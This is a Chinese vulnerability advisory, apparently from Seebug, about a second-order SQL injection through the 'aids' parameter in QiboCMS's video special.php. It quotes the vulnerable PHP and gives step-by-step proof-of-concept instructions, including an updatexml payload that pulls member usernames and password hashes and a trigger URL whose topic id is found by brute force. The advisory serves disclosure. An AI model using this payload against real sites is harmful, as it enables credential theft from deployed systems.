齐博视频系统 special.php 参数aids SQL注入漏洞

基本字段

漏洞编号：: SSV-91496

披露/发现时间：: 2016-05-09

提交时间：: 2016-05-09

漏洞等级：

漏洞类别：: SQL 注入

影响组件：: QiboCMS

漏洞作者：: 未知

提交者：: 匿名

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

贡献者 WuQ 共获得 0.1KB

###0x01漏洞简介齐博视频最新版，漏洞文件:video/member/special.php (发布专题的地方) 关键代码： ``` elseif($job=='addsp') { if($step==2){ $yz=($groupdb[PassContributeSP]||$web_admin)?1:0; $db->query("INSERT INTO `{$_pre}special` ( `fid` , `title` , `keywords` , `style` , `template` , `picurl` , `content` , `aids` ,`uid` , `username` , `posttime` , `list`, `allowpost`, `yz`, `banner` ) VALUES ('$postdb[fid]','$postdb[title]','$keywords','$style','','$postdb[picurl]','$postdb[content]','$aids','$lfjuid','$lfjid','$timestamp','$timestamp','$postdb[allowpost]','$yz','$postdb[banner]')"); refreshto("special.php?job=listsp","创建专题成功",1); } ``` 其中$aids没有初始化，由于伪全局的原因，所以用户可控。于是我们可以在这里向数据库引入单引号，虽然有全局转义，但是入库就被还原了。出库的地方：(这个页面有很多出库的地方，我就挑一处来验证，其他请自查)，和上面是相同的文件143-188行 ``` elseif($job=="show_iframe"){ $rsdb=$db->get_one("SELECT * FROM {$_pre}special WHERE uid='$lfjuid' AND id='$id'"); if(!$rsdb){ showerr("资料不存在",1); } if($act=="order") { unset($array); foreach( $listdb AS $aid=>$list){ $list=$list*1000000+$aid; $array[$list]=$aid; echo $listdb.$list.$aid;//自己的 } ksort($array); $rsdb[aids]=implode(",",$array); $db->query("UPDATE {$_pre}special SET aids='$rsdb[aids]' WHERE uid='$lfjuid' AND id='$id'"); } if($act=="add"&&$aid) { unset($_detail); $detail=explode(",",$rsdb[aids]); if(count($detail)>100){ showerr("记录已到上限!",1); } if(!in_array($aid,$detail)){ if($detail[0]==''){unset($detail[0]);} $_detail[a]=$aid; $rsdb[aids]=$string=implode(",",array_merge($_detail,$detail)); $db->query("UPDATE {$_pre}special SET aids='$string' WHERE uid='$lfjuid' AND id='$id'"); } } if($act=="del"&&$aid) { $detail=explode(",",$rsdb[aids]); foreach( $detail AS $key=>$value){ if($value==$aid){ unset($detail[$key]); } } $rsdb[aids]=$string=implode(",",$detail); $db->query("UPDATE {$_pre}special SET aids='$string' WHERE uid='$lfjuid' AND id='$id'"); } ``` 在条件if($act=="del"&&$aid)满足的情况下会进行一个update的操作，$string就是从我们上一步入库的地方查询出来再赋值的，而这里$string没有任何过滤和转义就造成了注入。 ###0x03漏洞证明 1.先注册会员 2.来到站内消息->视频系统->专题管理 ![](https://images.seebug.org/contribute/8627b059-1e4e-4ba3-af72-e3562df4082a) 点击发表专题 ![](https://images.seebug.org/contribute/33f7762a-1081-4ead-9a65-7f7f6e9c152b) 调好专题的内容，提交并且截包，在请求的地方添加,就是我画红线的地方，注意一定是加号而不是空格，#用url编码。 ``` 11'+or+updatexml(1,concat(0x7e,(SELECT+concat(username,0x7e,password)+FROM+qb_members+limit+0,1)),1)%23 ``` ![](https://images.seebug.org/contribute/7dcca16e-329d-438a-9a76-0768cfabe176) 看数据库 ![](https://images.seebug.org/contribute/ee55ba29-1f83-4fbd-b93d-e76c2619b6bb) 成功插入语句，现在就是出数据的地方了，直接访问 ``` http://xx.com/video/member/special.php?job=show_iframe&act=del&aid=2&id=21 ``` 其中的id就是我们发表的专题的id，我们是不知道的，这太容易解决了,用burp爆破id看看返回包就可以了，很容易的毕竟纯数字。看结果： ![](https://images.seebug.org/contribute/743b36a4-bfb7-4a41-9fef-bdad9f7a2694) ###0x04修复方案过滤。